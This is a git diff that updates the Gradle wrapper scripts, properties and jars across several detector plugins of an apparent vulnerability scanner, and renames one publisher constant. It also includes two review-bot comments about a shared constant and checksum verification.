@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar index afba10928..d64cd4917 100644 Binary files a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties index e5d4f45e4..d04736436 100644 --- a/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/ai/cve202348022/gradle/wrapper/gradle-wrapper.properties 
@@ -1,6 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/ai/cve202348022/gradlew b/google/detectors/rce/ai/cve202348022/gradlew index 65dcd68d6..1aa94a426 100755 --- a/google/detectors/rce/ai/cve202348022/gradlew +++ b/google/detectors/rce/ai/cve202348022/gradlew @@ -83,10 +83,8 @@ done # This is normally unused # shellcheck disable=SC2034 APP_BASE_NAME=${0##*/} -APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. MAX_FD=maximum @@ -133,10 +131,13 @@ location of your Java installation." fi else JAVACMD=java - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. @@ -144,7 +145,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then case $MAX_FD in #( max*) # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 MAX_FD=$( ulimit -H -n ) || warn "Could not query maximum file descriptor limit" esac 
@@ -152,7 +153,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then '' | soft) :;; #( *) # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 ulimit -n "$MAX_FD" || warn "Could not set maximum file descriptor limit to $MAX_FD" esac @@ -197,11 +198,15 @@ if "$cygwin" || "$msys" ; then done fi -# Collect all arguments for the java command; -# * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of -# shell script including quotes and variable substitutions, so put them in -# double quotes to make sure that they get re-expanded; and -# * put everything else in single quotes, so that it's not re-expanded. + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. set -- \ "-Dorg.gradle.appname=$APP_BASE_NAME" \ diff --git a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar index afba10928..d64cd4917 100644 Binary files a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties index e5d4f45e4..d04736436 100644 --- a/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties 
+++ b/google/detectors/rce/ai/cve20236018/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/ai/cve20236018/gradlew b/google/detectors/rce/ai/cve20236018/gradlew index 65dcd68d6..1aa94a426 100755 --- a/google/detectors/rce/ai/cve20236018/gradlew +++ b/google/detectors/rce/ai/cve20236018/gradlew @@ -83,10 +83,8 @@ done # This is normally unused # shellcheck disable=SC2034 APP_BASE_NAME=${0##*/} -APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. MAX_FD=maximum @@ -133,10 +131,13 @@ location of your Java installation." fi else JAVACMD=java - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. 
@@ -144,7 +145,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then case $MAX_FD in #( max*) # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 MAX_FD=$( ulimit -H -n ) || warn "Could not query maximum file descriptor limit" esac @@ -152,7 +153,7 @@ if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then '' | soft) :;; #( *) # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. - # shellcheck disable=SC3045 + # shellcheck disable=SC2039,SC3045 ulimit -n "$MAX_FD" || warn "Could not set maximum file descriptor limit to $MAX_FD" esac @@ -197,11 +198,15 @@ if "$cygwin" || "$msys" ; then done fi -# Collect all arguments for the java command; -# * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of -# shell script including quotes and variable substitutions, so put them in -# double quotes to make sure that they get re-expanded; and -# * put everything else in single quotes, so that it's not re-expanded. + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. set -- \ "-Dorg.gradle.appname=$APP_BASE_NAME" \ diff --git a/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties 
+++ b/google/detectors/rce/ai/cve20236019/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/confluence/cve202226134/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/confluence/cve202226134/gradlew b/google/detectors/rce/confluence/cve202226134/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/confluence/cve202226134/gradlew +++ b/google/detectors/rce/confluence/cve202226134/gradlew 
@@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/confluence/cve202226134/gradlew.bat b/google/detectors/rce/confluence/cve202226134/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/confluence/cve202226134/gradlew.bat +++ b/google/detectors/rce/confluence/cve202226134/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java b/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java index 7c66c6b9d..b4f2ae19a 100644 --- a/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java +++ b/google/detectors/rce/confluence/cve202226134/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202226134/ConfluenceOgnlInjectionRceDetector.java 
@@ -68,7 +68,7 @@ public final class ConfluenceOgnlInjectionRceDetector implements VulnDetector { "", "unknown", // nmap could not determine the service name, we try to exploit anyway. "opsmessaging"); // nmap returns opsmessaging service name for port 8090. - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE_2022_26134"; @VisibleForTesting diff --git a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/consul/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/consul/gradlew b/google/detectors/rce/consul/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/consul/gradlew +++ b/google/detectors/rce/consul/gradlew 
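Review bot: The changed `VULNERABILITY_REPORT_PUBLISHER` line keeps the publisher as a string literal private to this detector, and the same one-word edit is repeated in ConsulEnableScriptChecksCommandExecutionDetector.java later in this diff, so a missed file would split findings across two publisher spellings. The hunk does not show where the constant is consumed. If it becomes part of the reported vulnerability id, anything downstream that matches findings on the old value `"Google"` (suppression lists, dedup keys, dashboards) would need updating with this commit. I would add a comment above the constant, `// Publisher part of the reported vulnerability id; keep the value identical across all detectors.`, and as a follow-up move the literal into one shared constant. The class body continues outside the hunk.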
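Review bot: The new `distributionUrl` line for gradle-7.0-bin.zip is not paired with a `distributionSha256Sum` entry, so the wrapper will unpack and run whatever archive that URL serves. As far as I know, the added `validateDistributionUrl=true` concerns the URL itself rather than the content of the download, so it does not cover this. I would add `distributionSha256Sum=<sha256-of-gradle-7.0-bin.zip>` directly below the URL, with the value taken from Gradle's published checksums. The same hunk recurs in google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties and the other wrapper directories touched by this commit. Each of them also replaces the checked-in gradle-wrapper.jar (index 62d4c0535..d64cd4917), which should be compared against the published wrapper checksums before merge because a binary cannot be reviewed in the diff.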
@@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
